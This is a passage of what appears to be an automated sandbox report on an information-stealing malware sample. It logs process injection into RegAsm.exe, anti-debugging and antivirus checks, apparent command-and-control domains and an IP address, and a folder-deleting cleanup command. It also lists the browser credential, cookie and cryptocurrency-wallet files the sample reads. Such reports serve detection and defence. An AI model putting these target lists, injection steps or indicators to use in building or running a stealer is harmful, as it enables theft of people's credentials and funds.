,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_004195E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00419160 mov eax, dword ptr fs:[00000030h] 3_2_00419160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00415E38 mov eax, dword ptr fs:[00000030h] 29_2_00415E38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle, 3_2_00405000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0041C8D9 SetUnhandledExceptionFilter, 3_2_0041C8D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0041ACFA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0041A718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB7B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_6CB7B66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB7B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6CB7B1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CD2AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6CD2AC62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0041C8F8 SetUnhandledExceptionFilter, 29_2_0041C8F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0041AD5F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 29_2_0041AD5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0041A724 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 29_2_0041A724
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9EB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 29_2_6C9EB66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9EB1F7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 29_2_6C9EB1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB9AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 29_2_6CB9AC62
Source: C:\Users\user\Desktop\file.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: file.exe PID: 7412, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7492, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: userIEHDAFHDHC.exe PID: 7444, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3180, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\userFBKFCFBFID.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\userIEHDAFHDHC.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\DHCGHDHIDH.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\HDAFIIDAKJ.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_032C24A1 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread, 0_2_032C24A1
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\userFBKFCFBFID.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\userIEHDAFHDHC.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\DHCGHDHIDH.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\HDAFIIDAKJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: userFBKFCFBFID.exe, 00000012.00000002.1378322625.0000000003E95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: caffegclasiqwp.shop
Source: userFBKFCFBFID.exe, 00000012.00000002.1378322625.0000000003E95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: stamppreewntnq.shop
Source: userFBKFCFBFID.exe, 00000012.00000002.1378322625.0000000003E95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: stagedchheiqwo.shop
Source: userFBKFCFBFID.exe, 00000012.00000002.1378322625.0000000003E95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: millyscroqwp.shop
Source: userFBKFCFBFID.exe, 00000012.00000002.1378322625.0000000003E95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: evoliutwoqm.shop
Source: userFBKFCFBFID.exe, 00000012.00000002.1378322625.0000000003E95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: condedqpwqm.shop
Source: userFBKFCFBFID.exe, 00000012.00000002.1378322625.0000000003E95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: traineiwnqo.shop
Source: userFBKFCFBFID.exe, 00000012.00000002.1378322625.0000000003E95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: locatedblsoqp.shop
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 3_2_004190A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0040FD2A _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 29_2_0040FD2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0040FE05 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 29_2_0040FE05
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63E000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E22008
Source: C:\Users\userFBKFCFBFID.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\userFBKFCFBFID.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\userFBKFCFBFID.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000
Source: C:\Users\userFBKFCFBFID.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000
Source: C:\Users\userFBKFCFBFID.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000
Source: C:\Users\userFBKFCFBFID.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F82008
Source: C:\Users\userIEHDAFHDHC.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\userIEHDAFHDHC.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\userIEHDAFHDHC.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000
Source: C:\Users\userIEHDAFHDHC.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000
Source: C:\Users\userIEHDAFHDHC.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63B000
Source: C:\Users\userIEHDAFHDHC.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63C000
Source: C:\Users\userIEHDAFHDHC.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 84F008
Source: C:\ProgramData\DHCGHDHIDH.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\ProgramData\DHCGHDHIDH.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\ProgramData\DHCGHDHIDH.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000
Source: C:\ProgramData\DHCGHDHIDH.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000
Source: C:\ProgramData\DHCGHDHIDH.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000
Source: C:\ProgramData\DHCGHDHIDH.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 8AF008
Source: C:\ProgramData\HDAFIIDAKJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\ProgramData\HDAFIIDAKJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\ProgramData\HDAFIIDAKJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000
Source: C:\ProgramData\HDAFIIDAKJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000
Source: C:\ProgramData\HDAFIIDAKJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63B000
Source: C:\ProgramData\HDAFIIDAKJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63C000
Source: C:\ProgramData\HDAFIIDAKJ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BDD008
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userFBKFCFBFID.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userIEHDAFHDHC.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userFBKFCFBFID.exe "C:\Users\userFBKFCFBFID.exe"
Source: C:\Users\userFBKFCFBFID.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userIEHDAFHDHC.exe "C:\Users\userIEHDAFHDHC.exe"
Source: C:\Users\userIEHDAFHDHC.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\ProgramData\DHCGHDHIDH.exe "C:\ProgramData\DHCGHDHIDH.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\ProgramData\HDAFIIDAKJ.exe "C:\ProgramData\HDAFIIDAKJ.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGIIJDHCGCBK" & exit
Source: C:\ProgramData\DHCGHDHIDH.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAC1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError, 29_2_6CAC1C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB7B341 cpuid 3_2_6CB7B341
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 3_2_00417630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 29_2_0040E910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\userFBKFCFBFID.exe Queries volume information: C:\Users\userFBKFCFBFID.exe VolumeInformation
Source: C:\Users\userIEHDAFHDHC.exe Queries volume information: C:\Users\userIEHDAFHDHC.exe VolumeInformation
Source: C:\ProgramData\DHCGHDHIDH.exe Queries volume information: C:\ProgramData\DHCGHDHIDH.exe VolumeInformation
Source: C:\ProgramData\HDAFIIDAKJ.exe Queries volume information: C:\ProgramData\HDAFIIDAKJ.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00417420 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA, 3_2_00417420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004172F0 GetProcessHeap,HeapAlloc,GetUserNameA, 3_2_004172F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004174D0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 3_2_004174D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAC1BC0 memset,GetVersionExA, 29_2_6CAC1BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: file.exe, 00000000.00000002.1244342672.0000000001641000.00000004.00000020.00020000.00000000.sdmp, userFBKFCFBFID.exe, 00000012.00000002.1377947298.0000000001212000.00000004.00000020.00020000.00000000.sdmp, userIEHDAFHDHC.exe, 0000001B.00000002.1381565125.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, DHCGHDHIDH.exe, 00000027.00000002.1880887978.0000000001452000.00000004.00000020.00020000.00000000.sdmp, HDAFIIDAKJ.exe, 0000002A.00000002.1890730965.0000000000853000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
Source: Amcache.hve.33.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.33.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.33.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: file.exe, 00000000.00000002.1244342672.0000000001641000.00000004.00000020.00020000.00000000.sdmp, userFBKFCFBFID.exe, 00000012.00000002.1377947298.0000000001212000.00000004.00000020.00020000.00000000.sdmp, userIEHDAFHDHC.exe, 0000001B.00000002.1381565125.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, DHCGHDHIDH.exe, 00000027.00000002.1880887978.0000000001452000.00000004.00000020.00020000.00000000.sdmp, HDAFIIDAKJ.exe, 0000002A.00000002.1890730965.0000000000853000.00000004.00000020.00020000.00000000.sdmp, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr Binary or memory string: AVP.exe
Source: Amcache.hve.33.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2206607255.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2206607255.0000000000EDB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.33.dr Binary or memory string: MsMpEng.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 00000003.00000002.1384359989.000000000140A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7492, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 29.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.userIEHDAFHDHC.exe.38b5570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.userIEHDAFHDHC.exe.38b5570.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000002.1383374725.00000000038B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7492, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: userIEHDAFHDHC.exe PID: 7444, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3916, type: MEMORYSTR
Source: RegAsm.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: RegAsm.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: RegAsm.exe String found in binary or memory: \jaxx\Local Storage\
Source: RegAsm.exe String found in binary or memory: passphrase.json
Source: RegAsm.exe String found in binary or memory: \Ethereum\
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 147.45.44.104rontdesk\AppData\Roaming\Binance\.finger-print.fp
Source: RegAsm.exe String found in binary or memory: Ethereum
Source: RegAsm.exe String found in binary or memory: file__0.localstorage
Source: RegAsm.exe String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: RegAsm.exe String found in binary or memory: \Exodus\exodus.wallet\
Source: RegAsm.exe String found in binary or memory: ltiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
